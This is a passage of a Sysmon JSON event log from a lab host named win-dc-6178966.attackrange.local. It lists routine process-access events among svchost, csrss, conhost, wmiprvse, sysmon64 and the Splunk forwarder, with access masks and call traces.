07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2328\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2dbe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+155e9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+fa1f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1351d|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+127f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+ced2|C:\\Windows\\system32\\wbem\\wbemcore.dll+d531|C:\\Windows\\system32\\wbem\\wbemcore.dll+104fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+25435|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+dc51|C:\\Windows\\system32\\wbem\\wbemcore.dll+2cfdf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2328","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2dbe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+155e9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+fa1f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1351d|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+127f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+ced2|C:\\Windows\\system32\\wbem\\wbemcore.dll+d531|C:\\Windows\\system32\\wbem\\wbemcore.dll+104fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+25435|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+dc51|C:\\Windows\\system32\\wbem\\wbemcore.dll+2cfdf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.361\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nSourceProcessId: 4036\r\nSourceThreadId: 4040\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.361","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","SourceProcessId":"4036","SourceThreadId":"4040","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.377\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nSourceProcessId: 4060\r\nSourceThreadId: 4088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: 